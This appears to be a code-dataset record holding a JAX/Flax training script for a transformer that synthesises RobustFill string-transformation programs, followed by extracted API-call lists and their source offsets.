latent_programmer.decomposition_transformer_attention import decomposition_models as models\nfrom latent_programmer.decomposition_transformer_attention import input_pipeline\nfrom latent_programmer.tasks.robust_fill import dsl\nfrom latent_programmer.tasks.robust_fill import tokens as dsl_tokens\n\nsys.path.append('../../')\ngfile = tf.io.gfile\n\nFLAGS = flags.FLAGS\n\nflags.DEFINE_integer('seed', 0, 'Fixed random seed for training.')\nflags.DEFINE_float('lr', 1e-3, 'Learning rate.')\nflags.DEFINE_float('weight_decay', 1e-1,\n 'Decay factor for AdamW-style weight decay.')\nflags.DEFINE_integer('embedding_dim', 256, 'Embedding dimension.')\nflags.DEFINE_integer('hidden_dim', 512, 'Hidden dimension.')\nflags.DEFINE_integer('num_heads', 4, 'Number of layers.')\nflags.DEFINE_integer('num_layers', 3, 'Number of Transformer heads.')\nflags.DEFINE_boolean('slow_decode', True, 'Use slow decoding for prediction?')\n\nflags.DEFINE_string('dataset_filepattern', None,\n 'Filepattern for TFRecord dataset.')\nflags.DEFINE_integer('per_device_batch_size', 16,\n 'Number of program tasks in a batch.')\nflags.DEFINE_integer('num_strings_per_task', 4,\n 'Number of input/output strings per task.')\nflags.DEFINE_integer('max_program_length', 100,\n 'Maximum number of tokens in program.')\nflags.DEFINE_integer('max_characters', 120,\n 'Maximum number of characters in input/output strings.')\n\nflags.DEFINE_string('save_dir', None, 'Directory to save results to.')\nflags.DEFINE_integer('num_train_steps', 2000000, 'Number of training steps.')\nflags.DEFINE_integer('num_eval_steps', 10, 'Number of evaluation steps.')\nflags.DEFINE_integer('log_freq', 1000, 'Number of steps between training logs.')\nflags.DEFINE_integer('eval_freq', 2000, 'Number of steps between eval.')\nflags.DEFINE_integer('predict_freq', 50000,\n 'Number of steps between prediction (beam search).')\nflags.DEFINE_integer('checkpoint_freq', 50000,\n 'Number of steps between checkpoint saves.')\nflags.DEFINE_integer('finetune_start_step', -1,\n 'Step the initial checkpoint should start at for '\n 'finetuning, or -1 if not finetuning.')\nflags.DEFINE_bool('restore_checkpoints', True,\n 'Whether to restore from existing model checkpoints.')\n\nflags.DEFINE_string('attention_mask_type', 'bos_full_attention',\n 'The 
kind of attention mask to use. Options are: baseline, '\n 'bos_to_bos, bos_full_attention')\n\nflags.DEFINE_bool('use_relative_attention', True,\n 'Whether to use relative positonal embeddings.')\nflags.DEFINE_bool('bos_special_attention', False,\n 'Whether to use special relative attention computation for '\n 'BOS tokens.')\n\n\n_internal = False\nif not _internal:\n flags.DEFINE_string('xm_parameters', None,\n 'String specifying hyperparamter search.')\n\n\ndef create_learning_rate_scheduler(\n base_learning_rate=0.5,\n factors='constant * linear_warmup * rsqrt_normalized_decay',\n warmup_steps=16000,\n decay_factor=0.5,\n steps_per_decay=50000,\n steps_per_cycle=100000):\n \"\"\"Creates learning rate schedule.\n\n Interprets factors in the factors string which can consist of:\n * constant: interpreted as the constant value,\n * linear_warmup: interpreted as linear warmup until warmup_steps,\n * rsqrt_decay: divide by square root of max(step, warmup_steps)\n * decay_every: Every k steps decay the learning rate by decay_factor.\n * cosine_decay: Cyclic cosine decay, uses steps_per_cycle parameter.\n\n Args:\n base_learning_rate: float, the starting constant for the lr schedule.\n factors: a string with factors separated by '*' that defines the schedule.\n warmup_steps: how many steps to warm up for in the warmup schedule.\n decay_factor: The amount to decay the learning rate by.\n steps_per_decay: How often to decay the learning rate.\n steps_per_cycle: Steps per cycle when using cosine decay.\n\n Returns:\n A function learning_rate(step): float -> {'learning_rate': float}, the\n step-dependent lr.\n \"\"\"\n factors = [n.strip() for n in factors.split('*')]\n\n def step_fn(step):\n \"\"\"Step to learning rate function.\"\"\"\n ret = 1.0\n for name in factors:\n if name == 'constant':\n ret *= base_learning_rate\n elif name == 'linear_warmup':\n ret *= jnp.minimum(1.0, step / warmup_steps)\n elif name == 'rsqrt_decay':\n ret /= jnp.sqrt(jnp.maximum(1.0, step - warmup_steps))\n elif name == 'rsqrt_normalized_decay':\n ret *= jnp.sqrt(warmup_steps)\n ret /= jnp.sqrt(jnp.maximum(step, warmup_steps))\n elif name == 'decay_every':\n ret *= (decay_factor**(step // steps_per_decay))\n elif name == 'cosine_decay':\n progress = jnp.maximum(0.0,\n (step - warmup_steps) / float(steps_per_cycle))\n ret *= jnp.maximum(0.0,\n 0.5 * (1.0 + jnp.cos(jnp.pi * (progress % 1.0))))\n else:\n raise ValueError('Unknown factor %s.' % name)\n return jnp.asarray(ret, dtype=jnp.float32)\n\n return step_fn\n\n\ndef compute_weighted_cross_entropy(logits, targets, weights=None):\n \"\"\"Compute weighted cross entropy and entropy for log probs and targets.\n\n Args:\n logits: `[batch, length, num_classes]` float array.\n targets: categorical targets `[batch, length]` int array.\n weights: None or array of shape [batch, length, 1]\n\n Returns:\n Tuple of scalar loss and batch normalizing factor.\n \"\"\"\n if logits.ndim != targets.ndim + 1:\n raise ValueError('Incorrect shapes. 
Got shape %s logits and %s targets' %\n (str(logits.shape), str(targets.shape)))\n\n onehot_targets = common_utils.onehot(targets, logits.shape[-1])\n loss = -jnp.sum(onehot_targets * nn.log_softmax(logits), axis=-1)\n normalizing_factor = jnp.prod(jnp.asarray(targets.shape))\n if weights is not None:\n loss = loss * weights\n normalizing_factor = weights.sum()\n\n return loss.sum(), normalizing_factor\n\n\ndef compute_weighted_accuracy(logits, targets, weights=None):\n \"\"\"Compute weighted accuracy for log probs and targets.\n\n Args:\n logits: `[batch, length, num_classes]` float array.\n targets: categorical targets `[batch, length]` int array.\n weights: None or array of shape [batch, length, 1]\n\n Returns:\n Tuple of scalar accuracy and batch normalizing factor.\n \"\"\"\n if logits.ndim != targets.ndim + 1:\n raise ValueError('Incorrect shapes. Got shape %s logits and %s targets' %\n (str(logits.shape), str(targets.shape)))\n acc = jnp.equal(jnp.argmax(logits, axis=-1), targets)\n normalizing_factor = jnp.prod(jnp.asarray(targets.shape))\n if weights is not None:\n acc = acc * weights\n normalizing_factor = weights.sum()\n\n return acc.sum(), normalizing_factor\n\n\ndef compute_metrics(logits, targets, weights):\n \"\"\"Compute summary metrics.\"\"\"\n loss, weight_sum = compute_weighted_cross_entropy(logits, targets, weights)\n acc, _ = compute_weighted_accuracy(logits, targets, weights)\n metrics = {\n 'loss': loss,\n 'accuracy': acc,\n 'denominator': weight_sum,\n }\n metrics = jax.lax.psum(metrics, 'batch')\n return metrics\n\n\n# Train / eval / decode step functions.\n# -----------------------------------------------------------------------------\n\n\ndef train_step(optimizer,\n inputs,\n outputs,\n programs,\n learning_rate_fn,\n config,\n dropout_rng):\n \"\"\"Train on batch of program tasks.\"\"\"\n # We handle PRNG splitting inside the top pmap, rather\n # than handling it outside in the training loop - doing the\n # latter can add some stalls to the devices.\n dropout_rng, new_dropout_rng = jax.random.split(dropout_rng)\n\n weights = jnp.where(programs > 0, 1, 0).astype(jnp.float32)\n\n def loss_fn(params):\n \"\"\"Loss function used for training.\"\"\"\n logits = models.DecomposeAttentionTransformer(config).apply(\n {'params': params},\n inputs,\n outputs,\n programs,\n rngs={'dropout': dropout_rng})\n loss, weight_sum = compute_weighted_cross_entropy(logits, programs, weights)\n mean_loss = loss / weight_sum\n return mean_loss, logits\n\n step = optimizer.state.step\n lr = learning_rate_fn(step)\n grad_fn = jax.value_and_grad(loss_fn, has_aux=True)\n (_, logits), grad = grad_fn(optimizer.target)\n grad = jax.lax.pmean(grad, 'batch')\n new_optimizer = optimizer.apply_gradient(grad, learning_rate=lr)\n\n # Get metrics.\n metrics = compute_metrics(logits, programs, weights)\n metrics['learning_rate'] = lr\n return new_optimizer, metrics, new_dropout_rng\n\n\ndef eval_step(params, inputs, outputs, programs, eos_token, config):\n \"\"\"Collect metrics for evaluation during training.\"\"\"\n weights = jnp.where(\n jnp.logical_and(programs > 0,\n jnp.logical_and(programs != config.base_config.bos_token,\n programs != eos_token)),\n 1, 0).astype(jnp.float32)\n logits = models.DecomposeAttentionTransformer(config).apply(\n {'params': params}, inputs, outputs, programs)\n\n return compute_metrics(logits, programs, weights)\n\n\ndef initialize_cache(inputs, outputs, programs, max_decode_len, config):\n \"\"\"Initialize a cache for a given input shape and max decode 
length.\"\"\"\n target_shape = (programs.shape[0], max_decode_len)\n dtype = config.base_config.dtype\n initial_variables = models.DecomposeAttentionTransformer(config).init(\n jax.random.PRNGKey(0),\n jnp.ones(inputs.shape, dtype),\n jnp.ones(outputs.shape, dtype),\n jnp.ones(target_shape, dtype))\n return initial_variables['cache']\n\n\ndef predict_step(params,\n inputs,\n outputs,\n cache,\n beam_size,\n eos_token,\n max_decode_len,\n config,\n slow_decode=True):\n \"\"\"Predict translation with fast decoding beam search on a batch.\"\"\"\n # Prepare transformer fast-decoder call for beam search: for beam search, we\n # need to set up our decoder model to handle a batch size equal to\n # batch_size * beam_size, where each batch item's data is expanded in-place\n # rather than tiled.\n flat_encoded = decode.flat_batch_beam_expand(\n models.DecomposeAttentionTransformer(config).apply(\n {'params': params},\n inputs,\n outputs,\n method=models.DecomposeAttentionTransformer.encode),\n beam_size)\n\n encoded_padding_mask = jnp.where(outputs > 0, 1, 0).astype(jnp.float32)\n flat_encoded_padding_mask = decode.flat_batch_beam_expand(\n encoded_padding_mask, beam_size)\n\n if slow_decode:\n def tokens_ids_to_logits(flat_ids):\n \"\"\"Token slice to logits from decoder model.\"\"\"\n # --> [batch * beam, 1, vocab]\n flat_logits = models.DecomposeAttentionTransformer(config=config).apply(\n {'params': params},\n flat_ids,\n flat_encoded,\n flat_encoded_padding_mask,\n method=models.DecomposeAttentionTransformer.decode)\n return flat_logits\n else:\n def tokens_ids_to_logits(flat_ids, flat_cache):\n \"\"\"Token slice to logits from decoder model.\"\"\"\n # --> [batch * beam, 1, vocab]\n flat_logits, new_vars = models.DecomposeAttentionTransformer(\n config=config).apply(\n {'params': params, 'cache': flat_cache},\n flat_ids,\n flat_encoded,\n flat_encoded_padding_mask,\n mutable=['cache'],\n method=models.DecomposeAttentionTransformer.decode)\n new_flat_cache = new_vars['cache']\n # Remove singleton sequence-length dimension:\n # [batch * beam, 1, vocab] --> [batch * beam, vocab]\n flat_logits = flat_logits.squeeze(axis=1)\n return flat_logits, new_flat_cache\n\n # Using the above-defined single-step decoder function, run a\n # beam search over possible sequences given input encoding.\n beam_seqs, _ = decode.beam_search(\n inputs,\n cache,\n tokens_ids_to_logits,\n beam_size=beam_size,\n alpha=0.6,\n bos_token=config.base_config.bos_token,\n eos_token=eos_token,\n max_decode_len=max_decode_len,\n slow_decode=slow_decode)\n\n # Beam search returns [n_batch, n_beam, n_length] with beam dimension\n # sorted in increasing order of log-probability.\n return beam_seqs\n\n\n# Util functions for prediction\n# -----------------------------------------------------------------------------\n\n\ndef pad_examples(x, desired_batch_size):\n \"\"\"Expand batch to desired size by repeating last slice.\"\"\"\n batch_pad = desired_batch_size - x.shape[0]\n tile_dims = [1] * len(x.shape)\n tile_dims[0] = batch_pad\n return np.concatenate([x, np.tile(x[-1], tile_dims)], axis=0)\n\n\ndef tohost(x):\n \"\"\"Collect batches from all devices to host and flatten batch dimensions.\"\"\"\n n_device, n_batch, *remaining_dims = x.shape\n return x.reshape((n_device * n_batch,) + tuple(remaining_dims))\n\n\ndef per_host_sum_pmap(in_tree):\n \"\"\"Execute psum on in_tree's leaves over one device per host.\"\"\"\n host2devices = collections.defaultdict(list)\n for d in jax.devices():\n host2devices[d.host_id].append(d)\n devices = 
[host2devices[k][0] for k in host2devices]\n host_psum = jax.pmap(lambda x: jax.lax.psum(x, 'i'), 'i', devices=devices)\n def pre_pmap(xs):\n return jax.tree_map(lambda x: jnp.broadcast_to(x, (1,) + x.shape), xs)\n def post_pmap(xs):\n return jax.tree_map(lambda x: x[0], xs)\n return post_pmap(host_psum(pre_pmap(in_tree)))\n\n\ndef eval_predicted(predicted, inputs, outputs, parse_beam_fn):\n \"\"\"Evaluate predicted program beams.\"\"\"\n best_p, best_score = None, -1\n\n # predicted shape [beam_size, length]\n for beam in predicted[::-1]:\n try:\n p = parse_beam_fn(beam)\n p_outs = [p(inp) for inp in inputs]\n score = np.sum([p_out == out for p_out, out in zip(p_outs, outputs)])\n if score > best_score:\n best_p, best_score = p, score\n except: # pylint: disable=bare-except\n pass\n if best_score >= len(inputs): # Found solution.\n break\n return best_p, best_score\n\n\ndef shorten(key):\n splits = key.split('_')\n return ''.join(s[0] for s in splits)\n\n\ndef main(_):\n tf.enable_v2_behavior()\n\n tf.random.set_seed(FLAGS.seed)\n np.random.seed(FLAGS.seed)\n random.seed(FLAGS.seed)\n\n # BOS special attention only makes sense if we are using relative attention\n # and it's not the baseline.\n if FLAGS.bos_special_attention and (not FLAGS.use_relative_attention or\n FLAGS.attention_mask_type == 'baseline'):\n raise ValueError(\n \"bos_special_attention doesn't work when use_relative_attention={} and \"\n 'attention_mask_type={}'.format(FLAGS.use_relative_attention,\n FLAGS.attention_mask_type))\n\n if not gfile.isdir(FLAGS.save_dir):\n gfile.makedirs(FLAGS.save_dir)\n\n hparam_str_dict = dict(seed=FLAGS.seed, lr=FLAGS.lr)\n # Get hyperparmaters\n if FLAGS.xm_parameters:\n for key, value in json.loads(FLAGS.xm_parameters).items():\n if key not in hparam_str_dict:\n hparam_str_dict[key] = value\n\n hparam_str = ','.join(['%s=%s' % (shorten(k), str(hparam_str_dict[k]))\n for k in sorted(hparam_str_dict.keys())])\n\n # Number of local devices for this host.\n n_devices = jax.local_device_count()\n\n if jax.host_id() == 0:\n summary_writer = tensorboard.SummaryWriter(\n os.path.join(FLAGS.save_dir, 'tb', hparam_str))\n\n batch_size = FLAGS.per_device_batch_size * n_devices\n io_shape = (FLAGS.per_device_batch_size,\n FLAGS.num_strings_per_task,\n FLAGS.max_characters)\n program_shape = (FLAGS.per_device_batch_size, FLAGS.max_program_length)\n\n # Setup DSL\n # ---------------------------------------------------------------------------\n\n # Build token tables.\n id_char_table = {i+1: char for (i, char) in enumerate(dsl.CHARACTER)}\n char_id_table = {char: id for id, char in id_char_table.items()}\n id_token_table, token_id_table = dsl_tokens.build_token_tables()\n io_vocab_size = len(char_id_table) + 1 # For padding.\n program_vocab_size = len(token_id_table) + 1\n\n bos_token = token_id_table[dsl.BOS]\n eos_token = token_id_table[dsl.EOS]\n\n # Parse io and program token sequences (for eval).\n def decode_io(inputs, outputs):\n \"\"\"Decode io examples tokens.\"\"\"\n def decode_str(s):\n \"\"\"Decode string tokens.\"\"\"\n return ''.join([id_char_table[c_id] for c_id in s if c_id > 0])\n\n inps, outs = [], []\n for inp, out in zip(inputs, outputs):\n inps.append(decode_str(inp))\n outs.append(decode_str(out))\n return inps, outs\n\n def decode_program(program):\n \"\"\"Decode program tokens.\"\"\"\n program = program[:np.argmax(program == eos_token) + 1].astype(np.int32)\n program = program[program != bos_token]\n\n try:\n return dsl.decode_program(program.tolist(), id_token_table)\n except: 
# pylint: disable=bare-except\n return None # Program does not compile.\n\n # Load Dataset\n # ---------------------------------------------------------------------------\n logging.info('Initializing dataset.')\n if not FLAGS.dataset_filepattern:\n raise ValueError('Must specify filepattern to dataset.')\n\n # Training dataset.\n logging.info('Loading dataset from %s', FLAGS.dataset_filepattern)\n padded_shapes = (io_shape[1:], io_shape[1:], program_shape[1:])\n logging.info('padded_shapes: %s', padded_shapes)\n dataset = input_pipeline.create_dataset_from_tf_record(\n FLAGS.dataset_filepattern, token_id_table, char_id_table)\n dataset = dataset.padded_batch(\n batch_size,\n padded_shapes=padded_shapes,\n drop_remainder=True)\n # Split evaluation and training.\n eval_ds = dataset.take(FLAGS.num_eval_steps)\n # Decrease batch of predict dataset to handle beam search.\n predict_ds = eval_ds.unbatch().padded_batch(\n int(np.ceil(batch_size / 10)),\n padded_shapes=padded_shapes)\n train_ds = dataset.skip(FLAGS.num_eval_steps).repeat()\n train_iter = train_ds.as_numpy_iterator()\n\n # Build Model and Optimizer\n # ---------------------------------------------------------------------------\n use_dropout = False\n base_config = base_models.TransformerConfig(\n vocab_size=io_vocab_size,\n output_vocab_size=program_vocab_size,\n shift=True,\n emb_dim=FLAGS.embedding_dim,\n num_heads=FLAGS.num_heads,\n num_layers=FLAGS.num_layers,\n qkv_dim=FLAGS.embedding_dim,\n mlp_dim=FLAGS.hidden_dim,\n max_len=max(FLAGS.max_characters, FLAGS.max_program_length),\n use_relative_attention=FLAGS.use_relative_attention,\n deterministic=not use_dropout,\n decode=False,\n bos_token=bos_token)\n train_config = models.DecomposeAttentionTransformerConfig(\n base_config=base_config,\n attention_mask_type=FLAGS.attention_mask_type,\n bos_special_attention=FLAGS.bos_special_attention)\n eval_config = models.DecomposeAttentionTransformerConfig(\n base_config=base_config.replace(deterministic=not use_dropout),\n attention_mask_type=FLAGS.attention_mask_type,\n bos_special_attention=FLAGS.bos_special_attention)\n predict_config = models.DecomposeAttentionTransformerConfig(\n base_config=base_config.replace(\n shift=False, deterministic=not use_dropout,\n decode=not FLAGS.slow_decode),\n attention_mask_type=FLAGS.attention_mask_type,\n bos_special_attention=FLAGS.bos_special_attention)\n\n rng = jax.random.PRNGKey(FLAGS.seed)\n rng = jax.random.fold_in(rng, jax.host_id())\n rng, init_rng = jax.random.split(rng)\n\n m = models.DecomposeAttentionTransformer(eval_config)\n initial_variables = jax.jit(m.init)(\n {'params': init_rng, 'dropout': init_rng},\n jnp.ones(io_shape, jnp.float32),\n jnp.ones(io_shape, jnp.float32),\n jnp.ones(program_shape, jnp.float32))\n\n optimizer_def = optim.Adam(\n FLAGS.lr,\n beta1=0.9,\n beta2=0.98,\n eps=1e-9,\n weight_decay=FLAGS.weight_decay)\n optimizer = optimizer_def.create(initial_variables['params'])\n\n del initial_variables # Don't keep a copy of the initial model.\n\n start_step = 0\n if FLAGS.restore_checkpoints:\n # Restore unreplicated optimizer + model state from last checkpoint.\n optimizer = checkpoints.restore_checkpoint(\n os.path.join(FLAGS.save_dir, 'checkpoints', hparam_str), optimizer)\n # Grab last step.\n start_step = int(optimizer.state.step)\n logging.info('Found model checkpointed at step %d.', start_step)\n if FLAGS.finetune_start_step > 0:\n logging.info('Checking that start_step (%s) == finetune_start_step (%s)',\n start_step, FLAGS.finetune_start_step)\n assert 
start_step == FLAGS.finetune_start_step\n\n # Replicate optimizer.\n optimizer = jax_utils.replicate(optimizer)\n\n # TODO(jxihong): Implement fast decoding.\n assert FLAGS.slow_decode, 'Fast decoding is not implemented yet.'\n\n if FLAGS.finetune_start_step <= 0:\n learning_rate_fn = create_learning_rate_scheduler(\n base_learning_rate=FLAGS.lr)\n else:\n # Constant LR for finetuning.\n learning_rate_fn = create_learning_rate_scheduler(\n base_learning_rate=FLAGS.lr,\n factors='constant')\n p_train_step = jax.pmap(\n functools.partial(\n train_step,\n learning_rate_fn=learning_rate_fn,\n config=train_config),\n axis_name='batch')\n p_eval_step = jax.pmap(\n functools.partial(eval_step,\n eos_token=eos_token,\n config=eval_config),\n axis_name='batch')\n p_init_cache = jax.pmap(\n functools.partial(\n initialize_cache,\n max_decode_len=FLAGS.max_program_length,\n config=predict_config),\n axis_name='batch')\n p_pred_step = jax.pmap(\n functools.partial(\n predict_step,\n eos_token=eos_token,\n max_decode_len=FLAGS.max_program_length,\n config=predict_config,\n slow_decode=FLAGS.slow_decode),\n axis_name='batch',\n static_broadcasted_argnums=(4,))\n\n # Main Train Loop\n # ---------------------------------------------------------------------------\n dropout_rng = jax.random.split(rng, jax.local_device_count())\n del rng\n\n metrics_all = []\n tick = time.time()\n for step in range(start_step, FLAGS.num_train_steps):\n inputs, outputs, programs = common_utils.shard(next(train_iter))\n\n optimizer, metrics, dropout_rng = p_train_step(\n optimizer, inputs, outputs, programs, dropout_rng=dropout_rng)\n metrics_all.append(metrics)\n is_last_step = step == FLAGS.num_train_steps - 1\n\n # Save a Checkpoint\n if (step % FLAGS.checkpoint_freq == 0 and step > 0) or is_last_step:\n if jax.host_id() == 0:\n # Save unreplicated optimizer + model state.\n checkpoints.save_checkpoint(\n os.path.join(FLAGS.save_dir, 'checkpoints', hparam_str),\n jax_utils.unreplicate(optimizer),\n step)\n\n # Periodic metric handling.\n\n # Training Metrics\n if (step and step % FLAGS.log_freq == 0) or is_last_step:\n logging.info('Gathering training metrics.')\n metrics_all = common_utils.get_metrics(metrics_all)\n lr = metrics_all.pop('learning_rate').mean()\n metrics_sums = jax.tree_map(jnp.sum, metrics_all)\n denominator = metrics_sums.pop('denominator')\n summary = jax.tree_map(\n lambda x: x / denominator, # pylint: disable=cell-var-from-loop\n metrics_sums)\n summary['learning_rate'] = lr\n # Calculate (clipped) perplexity after averaging log-perplexities:\n summary['perplexity'] = jnp.clip(jnp.exp(summary['loss']), a_max=1.0e4)\n\n if jax.host_id() == 0:\n logging.info('Train in step: %d, loss: %.4f', step, summary['loss'])\n tock = time.time()\n steps_per_sec = FLAGS.log_freq / (tock - tick)\n tick = tock\n summary_writer.scalar('train/steps per second', steps_per_sec, step)\n for key, val in summary.items():\n summary_writer.scalar('train/' + key, val, step)\n summary_writer.flush()\n # Reset metric accumulation for next evaluation cycle.\n metrics_all = []\n\n # Evaluation Metrics\n if (step and step % FLAGS.eval_freq == 0) or is_last_step:\n logging.info('Gathering evaluation metrics.')\n t_evaluation_start = time.time()\n eval_metrics = []\n for batches in eval_ds.as_numpy_iterator():\n inputs, outputs, programs = common_utils.shard(batches)\n\n metrics = p_eval_step(optimizer.target, inputs, outputs, programs)\n eval_metrics.append(metrics)\n\n eval_metrics = common_utils.get_metrics(eval_metrics)\n 
eval_metrics_sums = jax.tree_map(jnp.sum, eval_metrics)\n eval_denominator = eval_metrics_sums.pop('denominator')\n eval_summary = jax.tree_map(\n lambda x: x / eval_denominator, # pylint: disable=cell-var-from-loop\n eval_metrics_sums)\n\n if jax.host_id() == 0:\n logging.info('Evaluation time: %.4f s step %d, loss: %.4f.',\n time.time()-t_evaluation_start, step, eval_summary['loss'])\n for key, val in eval_summary.items():\n summary_writer.scalar('eval/' + key, val, step)\n summary_writer.flush()\n\n # Beam search metrics.\n if (step and step % FLAGS.predict_freq == 0) or is_last_step:\n logging.info('Gathering beam search metrics.')\n for beam_size in [1, 5, 10, 20, 50]:\n t_inference_start = time.time()\n pred_acc = 0\n pred_denominator = 0\n\n ios, targets, predictions, top_of_beams = [], [], [], []\n for batches in predict_ds.as_numpy_iterator():\n pred_batch = batches\n # Handle final odd-sized batch by padding instead of dropping it.\n cur_pred_batch_size = pred_batch[0].shape[0]\n if cur_pred_batch_size % n_devices:\n padded_size = int(\n np.ceil(cur_pred_batch_size / n_devices) * n_devices)\n # pylint: disable=cell-var-from-loop\n pred_batch = jax.tree_map(\n lambda x: pad_examples(x, padded_size), pred_batch)\n inputs, outputs, programs = common_utils.shard(pred_batch)\n\n cache = (p_init_cache(inputs, outputs, programs)\n if not FLAGS.slow_decode else None)\n predicted = p_pred_step(optimizer.target, inputs, outputs, cache,\n beam_size)\n predicted = tohost(predicted)\n inputs, outputs, programs = map(tohost, (inputs, outputs, programs))\n\n pred_denominator += programs.shape[0]\n for i, beams in enumerate(predicted):\n inps, outs = decode_io(inputs[i], outputs[i])\n p, p_score = eval_predicted(\n beams, inps, outs, parse_beam_fn=decode_program)\n if p_score >= len(inps):\n pred_acc += 1\n ios.append(' ; '.join(map(str, zip(inps, outs))))\n targets.append(decode_program(programs[i]).to_string())\n try:\n predictions.append(p.to_string())\n except: # pylint: disable=bare-except\n predictions.append('Did not compile')\n logging.info('ios: %s', ios[-1])\n logging.info('target: %s', targets[-1])\n beams_log = []\n for beam in beams:\n try:\n beams_log.append(decode_program(beam).to_string())\n except: # pylint: disable=bare-except\n beams_log.append('Did not compile')\n logging.info('predicted beam: %s', '\\n'.join(beams_log))\n\n top_of_beam = []\n for index, beam in enumerate(beams[:-5:-1]):\n try:\n decoded_program = decode_program(beam).to_string()\n except: # pylint: disable=bare-except\n decoded_program = 'Did not compile'\n top_of_beam.append('index: {}, decoded: {}, tokens: {}'.format(\n index, decoded_program, beam))\n top_of_beams.append('\\n\\n'.join(top_of_beam))\n\n all_pred_acc, all_pred_denominator = per_host_sum_pmap(\n jax.tree_map(np.array, (pred_acc, pred_denominator)))\n\n # Record beam search results as text summaries.\n message = []\n for n in np.random.choice(np.arange(len(predictions)), 8):\n text = (f'ios: {ios[n]}\\n\\ntarget: {targets[n]}\\n\\n'\n f'predicted: {predictions[n]}\\n\\n'\n f'top of beam:\\n\\n{top_of_beams[n]}\\n\\n')\n message.append(text)\n\n # Write to tensorboard.\n if jax.host_id() == 0:\n slow_or_fast = 'slow' if FLAGS.slow_decode else 'fast'\n logging.info(\n 'Prediction time, %s (beam %d): %.4f s, step %d, score %.4f',\n slow_or_fast, beam_size, time.time() - t_inference_start, step,\n all_pred_acc / all_pred_denominator)\n summary_writer.scalar(\n 'predict-{}/score-{}'.format(slow_or_fast, beam_size),\n all_pred_acc / 
all_pred_denominator, step)\n summary_writer.text('samples-{}'.format(beam_size),\n '\\n------\\n'.join(message), step)\n summary_writer.flush()\n\n\nif __name__ == '__main__':\n app.run(main)\n"},"apis":{"kind":"list like","value":["flax.training.common_utils.shard","flax.optim.Adam","tensorflow.compat.v2.random.set_seed","latent_programmer.tasks.robust_fill.tokens.build_token_tables","absl.logging.info","jax.tree_map","latent_programmer.decode.beam_search","flax.training.common_utils.onehot","jax.jit","sys.path.append","absl.flags.DEFINE_float","jax.random.split","jax.random.PRNGKey","absl.flags.DEFINE_boolean","absl.app.run","jax.numpy.asarray","flax.jax_utils.replicate","flax.jax_utils.unreplicate","numpy.random.seed","jax.value_and_grad","numpy.tile","numpy.ceil","json.loads","jax.lax.psum","jax.numpy.where","jax.numpy.cos","jax.local_device_count","jax.devices","jax.numpy.broadcast_to","latent_programmer.decomposition_transformer_attention.decomposition_models.DecomposeAttentionTransformer","numpy.argmax","jax.lax.pmean","jax.numpy.ones","flax.training.common_utils.get_metrics","absl.flags.DEFINE_string","time.time","jax.host_id","tensorflow.compat.v2.enable_v2_behavior","latent_programmer.decomposition_transformer_attention.input_pipeline.create_dataset_from_tf_record","latent_programmer.decomposition_transformer_attention.decomposition_models.DecomposeAttentionTransformerConfig","jax.numpy.minimum","jax.numpy.logical_and","absl.flags.DEFINE_bool","absl.flags.DEFINE_integer","jax.numpy.sqrt","os.path.join","jax.numpy.exp","random.seed","jax.numpy.maximum","collections.defaultdict","latent_programmer.decode.flat_batch_beam_expand","functools.partial","flax.linen.log_softmax","jax.numpy.argmax"],"string":"[\n \"flax.training.common_utils.shard\",\n \"flax.optim.Adam\",\n \"tensorflow.compat.v2.random.set_seed\",\n \"latent_programmer.tasks.robust_fill.tokens.build_token_tables\",\n \"absl.logging.info\",\n \"jax.tree_map\",\n \"latent_programmer.decode.beam_search\",\n \"flax.training.common_utils.onehot\",\n \"jax.jit\",\n \"sys.path.append\",\n \"absl.flags.DEFINE_float\",\n \"jax.random.split\",\n \"jax.random.PRNGKey\",\n \"absl.flags.DEFINE_boolean\",\n \"absl.app.run\",\n \"jax.numpy.asarray\",\n \"flax.jax_utils.replicate\",\n \"flax.jax_utils.unreplicate\",\n \"numpy.random.seed\",\n \"jax.value_and_grad\",\n \"numpy.tile\",\n \"numpy.ceil\",\n \"json.loads\",\n \"jax.lax.psum\",\n \"jax.numpy.where\",\n \"jax.numpy.cos\",\n \"jax.local_device_count\",\n \"jax.devices\",\n \"jax.numpy.broadcast_to\",\n \"latent_programmer.decomposition_transformer_attention.decomposition_models.DecomposeAttentionTransformer\",\n \"numpy.argmax\",\n \"jax.lax.pmean\",\n \"jax.numpy.ones\",\n \"flax.training.common_utils.get_metrics\",\n \"absl.flags.DEFINE_string\",\n \"time.time\",\n \"jax.host_id\",\n \"tensorflow.compat.v2.enable_v2_behavior\",\n \"latent_programmer.decomposition_transformer_attention.input_pipeline.create_dataset_from_tf_record\",\n \"latent_programmer.decomposition_transformer_attention.decomposition_models.DecomposeAttentionTransformerConfig\",\n \"jax.numpy.minimum\",\n \"jax.numpy.logical_and\",\n \"absl.flags.DEFINE_bool\",\n \"absl.flags.DEFINE_integer\",\n \"jax.numpy.sqrt\",\n \"os.path.join\",\n \"jax.numpy.exp\",\n \"random.seed\",\n \"jax.numpy.maximum\",\n \"collections.defaultdict\",\n \"latent_programmer.decode.flat_batch_beam_expand\",\n \"functools.partial\",\n \"flax.linen.log_softmax\",\n 
\"jax.numpy.argmax\"\n]"},"extract_api":{"kind":"string","value":"[((1590, 1615), 'sys.path.append', 'sys.path.append', (['\"\"\"../../\"\"\"'], {}), \"('../../')\\n\", (1605, 1615), False, 'import sys\\n'), ((1658, 1724), 'absl.flags.DEFINE_integer', 'flags.DEFINE_integer', (['\"\"\"seed\"\"\"', '(0)', '\"\"\"Fixed random seed for training.\"\"\"'], {}), \"('seed', 0, 'Fixed random seed for training.')\\n\", (1678, 1724), False, 'from absl import flags\\n'), ((1725, 1774), 'absl.flags.DEFINE_float', 'flags.DEFINE_float', (['\"\"\"lr\"\"\"', '(0.001)', '\"\"\"Learning rate.\"\"\"'], {}), \"('lr', 0.001, 'Learning rate.')\\n\", (1743, 1774), False, 'from absl import flags\\n'), ((1774, 1863), 'absl.flags.DEFINE_float', 'flags.DEFINE_float', (['\"\"\"weight_decay\"\"\"', '(0.1)', '\"\"\"Decay factor for AdamW-style weight decay.\"\"\"'], {}), \"('weight_decay', 0.1,\\n 'Decay factor for AdamW-style weight decay.')\\n\", (1792, 1863), False, 'from absl import flags\\n'), ((1880, 1946), 'absl.flags.DEFINE_integer', 'flags.DEFINE_integer', (['\"\"\"embedding_dim\"\"\"', '(256)', '\"\"\"Embedding dimension.\"\"\"'], {}), \"('embedding_dim', 256, 'Embedding dimension.')\\n\", (1900, 1946), False, 'from absl import flags\\n'), ((1947, 2007), 'absl.flags.DEFINE_integer', 'flags.DEFINE_integer', (['\"\"\"hidden_dim\"\"\"', '(512)', 